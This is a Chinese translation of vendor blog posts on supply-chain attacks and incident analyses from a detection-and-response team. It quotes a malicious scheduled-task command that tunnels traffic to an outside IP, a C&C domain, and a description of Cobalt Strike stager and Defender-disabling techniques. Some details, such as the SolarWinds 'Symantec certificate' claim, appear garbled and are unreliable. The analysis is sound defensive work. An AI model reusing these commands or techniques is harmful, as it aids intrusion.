信息化觀察網(wǎng)

本文，我們將看到托管檢測和響應(yīng)(MDR)團(tuán)隊在過去幾年中遇到的多個個供應(yīng)鏈攻擊示例。

與過去必須手動配置和維護(hù)每個終端相比，現(xiàn)代技術(shù)使管理大型IT環(huán)境變得不那么令人生畏。許多組織現(xiàn)在使用允許集中管理終端的工具和IT解決方案，從而可以從遠(yuǎn)程位置更新、、排除故障和部署應(yīng)用程序。

然而，這種便利是有代價的，就像IT人員可以從一個位置訪問設(shè)備一樣，現(xiàn)代技術(shù)基礎(chǔ)設(shè)施的集中化特性也意味著攻擊者可以瞄準(zhǔn)主要中心以獲得對整個系統(tǒng)的訪問權(quán)限。更令人擔(dān)憂的是，攻擊者甚至不再需要對組織發(fā)起直接攻擊，他們可以通過關(guān)注目標(biāo)的供應(yīng)鏈來繞過安全措施。例如，攻擊者不會試圖找到大型組織系統(tǒng)中可能有強(qiáng)大防御的弱點，而是會瞄準(zhǔn)為大型企業(yè)開發(fā)軟件的小型公司。

當(dāng)今的供應(yīng)鏈攻擊利用信任關(guān)系威脅企業(yè)安全

當(dāng)我們想到“信任”這個詞時，哪些想法會跳到我們的腦海中？它最初會讓人想起個人關(guān)系，與我們最親密的家庭成員和長期的朋友或同事之間的關(guān)系，你知道這些人始終如一地、可靠地在你身邊。

如果我們將信任與信息安全行業(yè)以及我們?yōu)閹椭Ｗo(hù)我們的組織而實施的第三方工具和系統(tǒng)聯(lián)系起來，那么相同的概念也適用。我們信任安全系統(tǒng)，這些系統(tǒng)通過證明其可靠性和一致性，展示完整性、價值和機(jī)密性，以及許多其他數(shù)據(jù)點中的可信推薦網(wǎng)絡(luò)，贏得了我們的信任。

然而，當(dāng)我們選擇一個安全系統(tǒng)來幫助保護(hù)我們自己時，我們自己的弱點和隱私也會暴露在關(guān)系鏈中，而這也超出了信任的直接控制范圍。

供應(yīng)鏈攻擊就是著眼于脆弱的信任領(lǐng)域。這些鏈中的弱點可用于繞過你對自己的安全系統(tǒng)、流程和組織的隱性信任。

接下來我們將探討這些鏈遭到破壞的一些示例，并希望從這些事件中吸取教訓(xùn)，以幫助識別信任弱點并幫助緩解未來潛在的問題。

RSA攻擊

早在2011年，RSA（EMC的安全部門）就遭到攻擊，關(guān)鍵的SecurID產(chǎn)品機(jī)密被盜。這些秘密將允許攻擊者克隆和復(fù)制由RSA提供的雙因素身份驗證系統(tǒng)。

通過闖入RSA，攻擊者訪問了產(chǎn)品底層數(shù)據(jù)，攻擊了多達(dá)4000萬個令牌。

CCleaner被攻擊

2017年3月，廣受歡迎的名為CCleaner的計算機(jī)清理軟件遭到攻擊者的入侵，這些受害者將CCleaner作為值得信賴的工具，受感染副本的下載量約為160萬次。

攻擊者破壞了CCleaner網(wǎng)絡(luò)的制造商，將他們稱為ShadowPad的軟件注入到應(yīng)用程序中。

NotPetya攻擊

2017年夏季的NotPeyta攻擊涉及一種勒索軟件式攻擊，該攻擊會加密數(shù)據(jù)，在某些情況下還會破壞受感染計算機(jī)的MBR（主引導(dǎo)記錄）。

該攻擊利用了Shadowbrokers最近發(fā)布的Eternalblue和EternalRomance漏洞，利用了運行MS Windows的計算機(jī)的SMBv1（服務(wù)器消息塊）協(xié)議中的漏洞。這些漏洞與當(dāng)年早些時候WannaCry爆發(fā)中使用的漏洞相同。

華碩軟件更新攻擊

2019年，計算機(jī)制造巨頭ASUSTek Computer（通常稱為ASUS）發(fā)現(xiàn)其實時更新服務(wù)存在問題，結(jié)果得知該服務(wù)在2018年早些時候遭到入侵。此次入侵使得這款本應(yīng)合法且受信任的軟件能夠?qū)阂廛浖魉偷綌?shù)以千計的華碩客戶。

該攻擊影響了13000臺計算機(jī)，其中80%是消費者客戶，其余是企業(yè)。但是，第二階段惡意軟件通過特定MAC地址列表具有高度針對性。發(fā)現(xiàn)安裝了惡意版本的華碩Live Update軟件（通常用于向華碩組件和應(yīng)用程序提供更新），并用于提供惡意軟件的二級載荷。

這次攻擊最有趣的是，被感染以傳播惡意軟件的ASUS Live Update版本是由華碩計算機(jī)證書合法簽名的。通過獲得對該應(yīng)用程序的簽名權(quán)限的訪問權(quán)限，攻擊者能夠有效地繞過已放置在證書基礎(chǔ)結(jié)構(gòu)中的信任關(guān)系。

SolarWinds

雖然在上述事件之后供應(yīng)鏈攻擊似乎暫時停止，但Solarwinds攻擊使供應(yīng)鏈攻擊又出現(xiàn)在人們的視野中。

SolarWinds是一家廣受信賴的軟件供應(yīng)商，擁有約300000名客戶。攻擊者設(shè)法將他們的惡意軟件注入到合法的賽門鐵克證書中，該證書用于更新SolarWinds軟件。

經(jīng)過進(jìn)一步調(diào)查，SolarWinds報告稱，有證據(jù)表明惡意代碼在2020年3月至2020年6月期間被放入他們的軟件和更新中。

SolarWinds攻擊非常復(fù)雜。例如，該惡意軟件具有沙箱感知能力，僅在休眠14天后才被激活。鑒于受到影響的目標(biāo)的性質(zhì)，例如美國政府機(jī)構(gòu)，以及攻擊者的復(fù)雜程度，很快就發(fā)現(xiàn)攻擊行為者本質(zhì)上是APT，現(xiàn)在人們普遍將其歸咎于俄羅斯外國情報局(SVR)。

對Kaseya平臺的攻擊

7月2日，在Kaseya勒索軟件事件的高峰期，研究人員通知了他們的一位客戶，通知在他們系統(tǒng)中檢測到勒索軟件。

示例時間線

當(dāng)作為Kaseya代理的一部分的文件AgentMon.exe產(chǎn)生另一個文件cmd.exe時，研究人員的調(diào)查發(fā)現(xiàn)了可疑活動，該文件負(fù)責(zé)創(chuàng)建有效載荷agent.exe，而后者又釋放了MsMpEng.exe

通過根本原因分析(RCA)并檢查cmd.exe的參數(shù)，研究人員能夠在勒索軟件執(zhí)行之前看到一些項目。

Vision One控制臺顯示攻擊的感染鏈

研究人員發(fā)現(xiàn)該惡意軟件試圖通過PowerShell命令禁用Windows Defender的反惡意軟件和反勒索軟件功能。它還創(chuàng)建了Windows命令行程序Certutil.exe的副本到“C:Windowscert.exe”，用于解碼有效載荷文件agent.crt，輸出名稱為agent.exe。Agent.exe然后用于創(chuàng)建文件MsMpEng.exe，這是Windows Defender的一個版本，容易受到DLL側(cè)加載的攻擊。

攻擊的詳細(xì)信息

雖然機(jī)器學(xué)習(xí)檢測功能設(shè)法阻止和檢測勒索軟件，但是，保護(hù)模塊并沒有在趨勢科技Apex One™的所有安全代理中激活，所以組織的支持要求團(tuán)隊檢查他們的產(chǎn)品設(shè)置。由于流程鏈顯示勒索軟件來自Kaseya代理，趨勢科技的研究人員要求客戶隔離Kaseya服務(wù)器以遏制攻擊。

幾個小時后，Kaseya向用戶發(fā)布通知，要求他們立即關(guān)閉虛擬系統(tǒng)/服務(wù)器管理員(VSA)服務(wù)器，直到另行通知。

對Active Directory的憑據(jù)轉(zhuǎn)儲攻擊

MDR團(tuán)隊發(fā)現(xiàn)的第二個供應(yīng)鏈?zhǔn)录紫认蚩蛻舭l(fā)出警報，該警報通知他們在其活動目錄(AD)中發(fā)生憑據(jù)轉(zhuǎn)儲。Trend Micro Vision One™?中的事件視圖將其他檢測聚合到一個視圖中，提供有關(guān)攻擊范圍的附加信息。這樣，研究人員就能夠看到與攻擊相關(guān)的服務(wù)器、終端和用戶。

Vision One的事件視圖顯示了攻擊的詳細(xì)信息

攻擊追蹤團(tuán)隊還注意到與WmiExec相關(guān)的可疑行為，對受影響主機(jī)的所有權(quán)對齊工具(OAT)的進(jìn)一步調(diào)查顯示了一個相關(guān)的持久性條目：

C:WindowsSystem32schtasks.exe/CREATE/RU SYSTEM/SC HOURLY/TN"Windows Defender"/TR"powershell.exe C:WindowsSystem.exe-L rtcp://0.0.0.0:1035/127.0.0.1:25-F mwss://52.149.228.45:443"/ST 12:00

OAT標(biāo)記計劃任務(wù)的可疑創(chuàng)建

研究人員發(fā)現(xiàn)計劃任務(wù)被用作文件System.exe的持久性機(jī)制。對該文件的進(jìn)一步分析表明，它與GO簡單隧道有關(guān)，該隧道用于根據(jù)參數(shù)將網(wǎng)絡(luò)流量轉(zhuǎn)發(fā)到一個IP地址。

檢查初始警報顯示了兩個主機(jī)中的一個公共文件，這促使我們檢查IOC列表，以確定環(huán)境中其他受影響的主機(jī)。

進(jìn)程鏈中明顯的發(fā)現(xiàn)命令和對惡意域的訪問

RCA擴(kuò)展節(jié)點允許研究人員收集顯示setup0.exe創(chuàng)建文件elevateutils.exe的其他IOC。此外，有人看到elevateutils.exe查詢域vmware[.]center，這可能是攻擊的命令和控制(C&C)服務(wù)器，研究人員還在其中一臺主機(jī)中發(fā)現(xiàn)了最早的setup0.exe實例。

示例setup0.exe是elevateutils.exe的安裝程序，根據(jù)研究人員的分析，它似乎是Cobalt Strike Beacon Malleable C&C stager，安裝程序可能已被用來偽裝成正常的文件安裝。

EICAR字符串的存在表明elevateutils.exe是Cobalt Strike Beacon

stager elevateutils.exe：將嘗試加載DLL chartdir60.dll，該DLL將依次讀取manual.pdf的內(nèi)容(這些內(nèi)容也被安裝程序放在與elevateutil.exe相同的目錄下)。然后，它會在內(nèi)存中解密、加載和執(zhí)行一個shell代碼，該代碼將訪問URL vmware[.]center/mV6c。

它利用VirtualAlloc、VirtualProtect、CreateThread和一個函數(shù)來解密shellcode，以便在內(nèi)存中加載和執(zhí)行。它還在一個單獨的函數(shù)中使用解密后的間接API調(diào)用，然后根據(jù)需要使用JMP EAX調(diào)用該函數(shù)，這不是一個普通文件應(yīng)該具有的例程或行為。

由于這可能是Cobalt Strike Malleable C&C stager，進(jìn)一步的行為可能取決于從訪問的URL下載的內(nèi)容。但是，由于在撰寫此文時無法訪問，研究人員無法觀察或驗證其他行為。

使用Vision One的漸進(jìn)式RCA使我們能夠看到elevateutils.exe是如何創(chuàng)建的，以及它的行為。惡意文件是通過Desktop Central代理部署的。

查看elevateutils.exe的行為

顯示攻擊感染鏈的控制臺

基于這些發(fā)現(xiàn)，研究人員向客戶建議檢查受影響應(yīng)用程序的登錄日志，以驗證在部署攻擊期間是否存在任何可疑的帳戶使用情況。

通過密切監(jiān)視環(huán)境，在憑證轉(zhuǎn)儲后停止了攻擊。此外，IOC（IP地址和哈希）被添加到可疑對象列表中，以在等待檢測時阻止它們。通過進(jìn)一步的監(jiān)控，沒有發(fā)現(xiàn)其他可疑行為。

供應(yīng)鏈攻擊的共性

對這些示例的分析表明，攻擊者通常要么通過受損但合法的證書數(shù)字簽名來操縱代碼簽名程序，要么劫持ISV解決方案的更新傳播網(wǎng)絡(luò)，要么破壞原始源代碼。

除了最近的Kayesa攻擊利用已知漏洞的面向外部的服務(wù)外，大多數(shù)攻擊者都具有很高的復(fù)雜程度。

供應(yīng)鏈攻擊的緩解措施

隨著企業(yè)之間的聯(lián)系越來越緊密，一次成功的供應(yīng)鏈攻擊有可能對受影響的組織造成重大攻擊。未來會看到更多此類攻擊，因為它們通常會導(dǎo)致與直接攻擊相同的結(jié)果，同時為攻擊者提供更廣泛的攻擊面。

供應(yīng)鏈攻擊很難追蹤，因為目標(biāo)組織通常無法完全訪問供應(yīng)鏈合作伙伴的安全方面的情況。公司內(nèi)部的安全漏洞通常會加劇這種情況。例如，產(chǎn)品和軟件可能有一些配置，例如文件夾排除和檢測模塊的次優(yōu)實現(xiàn)，這些配置使得攻擊更難以被注意到。

安全審計也是確保供應(yīng)鏈安全的一個非常重要的步驟。即使已知第三方供應(yīng)商值得信賴，仍應(yīng)部署安全預(yù)防措施，以防帳戶被盜甚至內(nèi)部攻擊。另外，攻擊者總是試圖通過攻擊一個最終目標(biāo)的上游供應(yīng)商，然后濫用他們與真正目標(biāo)之間的信任關(guān)系來實現(xiàn)他們的目標(biāo)。這些供應(yīng)鏈攻擊利用我們環(huán)境中的一個受信任的組件，而這就在我們最脆弱的地方，我們最不可見的地方。

?制定并實施供應(yīng)商風(fēng)險管理計劃，以評估、跟蹤和衡量第3方風(fēng)險；

?強(qiáng)制多因素身份驗證(MFA)以防止最典型的身份驗證暴力強(qiáng)制攻擊；

?通過合同要求強(qiáng)制執(zhí)行供應(yīng)商網(wǎng)絡(luò)安全評估，包括針對供應(yīng)商自身的供應(yīng)鏈風(fēng)險；

?需要ISO 27001認(rèn)證或CMMI和/或遵守NIST或CIS等網(wǎng)絡(luò)安全框架；

?計劃轉(zhuǎn)向零信任網(wǎng)絡(luò)(ZTA)架構(gòu)，確保所有身份和終端不再默認(rèn)受信任，而是針對每個訪問請求持續(xù)驗證；

?部署一個現(xiàn)代的、與平臺無關(guān)的XDR平臺，該平臺能夠檢測和修復(fù)跨終端、云和網(wǎng)絡(luò)基礎(chǔ)設(shè)施的復(fù)雜攻擊；

?提高你的網(wǎng)絡(luò)和終端可見性保留率，以便識別長期持續(xù)的攻擊；

使用Vision One遏制攻擊

Trend Micro Vision One為組織提供了跨多個安全層檢測和響應(yīng)攻擊的能力。它為企業(yè)提供了應(yīng)對攻擊的選項，例如本博文討論的攻擊：

?它可以隔離終端，這些終端通常是感染源，直到它們被完全清理；

?它可以阻止與攻擊相關(guān)的IOC，包括在分析過程中發(fā)現(xiàn)的哈希值、IP地址或域；

?它可以收集文件以供進(jìn)一步調(diào)查；

本文翻譯自：https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html和https://www.sentinelone.com/blog/how-todays-supply-chain-attacks-are-changing-enterprise-security/